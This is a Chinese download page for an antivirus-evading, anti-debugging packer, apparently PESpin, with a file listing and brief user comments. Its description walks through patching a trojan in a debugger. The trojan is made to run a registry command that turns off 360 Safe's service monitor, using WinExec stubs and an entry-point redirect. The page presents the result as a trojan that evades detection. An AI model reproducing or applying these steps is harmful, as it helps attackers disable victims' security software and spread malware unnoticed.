反调试伪装加密免杀壳.加壳工具

时间:2016-02-04 04:41:08
【文件属性】:

文件名称:反调试伪装加密免杀壳.加壳工具

文件大小:58KB

文件格式:RAR

更新时间:2016-02-04 04:41:08

加壳工具.

反调试伪装加密免杀壳.加壳工具ASM汇编 这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。 再找一个小空段,记下地址,假设为40116A 写入: Push 401180 (也就是那个改动的地址) Call WinExec Jmp 原程序入口点(在OD右边窗口的EIP后面可以看到) 打开OC把40116A转换为文件偏移0000056A 再用PEditor打开,把原入口点改为0000056A 这样一个过360服务监控的木马就诞生了。 (大家完全可以按照加花的步骤来写,就是命令不同而已) 大家也可以禁用其他360的监控项目,即使加个花都没问题,随便大家发挥了。


【文件预览】:
PESpin.chm
PESpin.exe
Examples
----pespin.inc(1KB)
----pespin.h(5KB)
----c()
--------gui.h(46B)
--------make.bat(137B)
--------gui.res(2KB)
--------gui.c(1KB)
----delphi()
--------Project1.res(2KB)
--------clear_end.inc(311B)
--------Unit1.dfm(6KB)
--------crypt_start.inc(60B)
--------clear_start.inc(224B)
--------crypt_end.inc(59B)
--------Unit1.pas(2KB)
--------Project1.dpr(188B)
----asm()
--------res_file.res(3KB)
--------_masm.bat(265B)
--------markers_test.asm(5KB)
pespin.ini
汉化说明.txt

网友评论

  • 一般吧,还是会报毒
  • 不过的工具
  • 很好的家客